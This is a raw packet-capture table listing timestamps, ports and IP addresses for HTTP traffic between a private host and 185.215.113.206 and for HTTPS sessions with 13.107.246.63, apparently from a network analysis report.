Dec 7, 2024 12:59:52.530457973 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.530499935 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.530700922 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.531223059 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.531255960 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.531295061 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.531476974 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.531517982 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.532114029 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.532155991 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.532339096 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.532381058 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.532912016 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.532948971 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.533145905 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.533188105 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.533788919 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.533833981 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.533961058 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.534003973 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.534614086 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.534662008 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.534832954 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.534874916 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.535595894 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.535777092 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.535820007 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.579524994 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.579534054 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.579689980 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.648988008 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.649221897 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.649333954 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.649470091 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.649626970 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.649681091 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.649986982 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.650036097 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.650329113 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.650420904 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.650465965 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.650791883 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.650836945 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.651139975 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.651227951 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.651252985 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.651635885 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.651684046 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.652049065 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.652228117 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.652267933 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.652565956 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.652611971 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.652929068 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.653091908 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.653137922 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.653397083 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.653441906 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.653871059 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.653915882 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.654093981 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.654135942 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.654402971 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.654448032 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.654664993 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.654710054 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.655231953 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.655441046 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.655483007 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.656079054 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.656297922 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.656342030 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.656904936 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.657115936 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.657164097 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.657867908 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.657912016 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.657979965 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.658595085 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.658642054 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.658814907 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.659225941 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.659343004 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.659559965 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.659605026 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.660181999 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.660378933 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.660420895 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.661128044 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.661169052 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.661551952 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.662360907 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.662399054 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.662508965 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.662951946 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.662990093 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.663132906 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.663172007 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.663506031 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.663692951 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.663733959 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.664339066 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.664511919 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.664551973 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.665292025 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.665468931 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.665514946 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.666053057 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.666100025 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.666198969 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.666764975 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.666810989 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.667006016 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.667227983 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.667660952 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.667870045 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.667916059 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.668428898 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.668634892 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.668678045 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.669262886 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.669325113 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.669415951 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.670111895 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.670156002 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.670233011 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.670897961 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.670939922 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.671180010 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.671231031 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.671828985 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.671873093 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.671977997 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.672022104 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.673702955 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.673749924 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.674371958 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.674387932 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.674398899 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.674416065 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.674438000 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.675064087 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.675077915 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.675107956 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.675129890 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.710822105 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.711095095 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.711204052 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.711538076 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.711994886 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.712045908 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.712344885 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.712658882 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.712706089 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.712959051 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.713005066 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.713152885 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.713624001 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.713666916 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.714072943 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.714315891 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.714368105 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.714853048 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.714900017 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.715009928 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.715229034 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.715655088 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.715697050 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.715822935 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.715866089 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.716015100 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.716059923 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.716597080 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.716646910 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.716806889 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.716850996 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.717493057 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.717531919 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.717710018 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.717753887 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.718225956 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.718547106 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.718588114 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.718746901 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.719224930 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.719321966 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.719520092 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.719562054 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.720158100 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.723228931 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.742233992 CET	443	49810	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.742300987 CET	443	49810	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.742463112 CET	49810	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.742563009 CET	49810	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.742573023 CET	443	49810	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.742585897 CET	49810	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.742589951 CET	443	49810	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.745232105 CET	49815	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.745255947 CET	443	49815	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.745466948 CET	49815	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.745632887 CET	49815	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.745644093 CET	443	49815	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.746731043 CET	443	49811	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.746756077 CET	443	49811	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.746803045 CET	443	49811	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.746855974 CET	49811	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.746911049 CET	49811	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.746925116 CET	443	49811	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.746933937 CET	49811	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.746938944 CET	443	49811	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.748867035 CET	49816	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.748893976 CET	443	49816	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.748965979 CET	49816	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.749079943 CET	49816	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.749094963 CET	443	49816	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.780086040 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.780137062 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.780241966 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.780410051 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.780579090 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.780627012 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.780723095 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.780767918 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.781239033 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.781286001 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.781452894 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.781517029 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.781533003 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.781573057 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.781883955 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.781927109 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.782224894 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.782269001 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.782358885 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.782407045 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.782706022 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.782751083 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.783175945 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.783224106 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.783427954 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.783478975 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.783982992 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.784025908 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.784212112 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.784260988 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.784835100 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.784878969 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.785094023 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.785139084 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.785325050 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.785371065 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.785998106 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.786042929 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.786138058 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.786181927 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.786734104 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.786782980 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.786978960 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.787024975 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.787592888 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.787640095 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.787806988 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.787851095 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.788429976 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.788474083 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.788582087 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.788623095 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.789278984 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.789324999 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.789385080 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.789428949 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.842559099 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.842608929 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.842655897 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.842694998 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.843058109 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.843167067 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.843447924 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.843534946 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.843934059 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.843986034 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.844276905 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.844330072 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.844610929 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.844713926 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.844907999 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.844980001 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.845267057 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.845355988 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.845597029 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.845813990 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.845990896 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.846039057 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.846493006 CET	443	49812	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.846560001 CET	443	49812	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.846600056 CET	49812	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.846740007 CET	49812	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.846748114 CET	443	49812	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.846760035 CET	49812	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.846765041 CET	443	49812	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.846770048 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.846808910 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.847069025 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.847230911 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.847434044 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.847486019 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.847763062 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.847806931 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.848229885 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.848362923 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.848634005 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.848768950 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.848853111 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.848891973 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.849191904 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.849241018 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.849461079 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.849575043 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.849571943 CET	49817	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.849652052 CET	443	49817	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.849747896 CET	49817	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.849920034 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.849971056 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.849982977 CET	49817	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.850013018 CET	443	49817	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.889576912 CET	443	49813	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.890831947 CET	49813	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.890853882 CET	443	49813	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.891268969 CET	49813	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.891274929 CET	443	49813	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.939944983 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.059643984 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.326112032 CET	443	49813	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:53.326139927 CET	443	49813	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:53.326250076 CET	49813	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:53.326268911 CET	443	49813	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:53.326596975 CET	49813	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:53.326610088 CET	443	49813	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:53.326617956 CET	49813	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:53.326764107 CET	443	49813	13.107.246.63	192.168.2.7
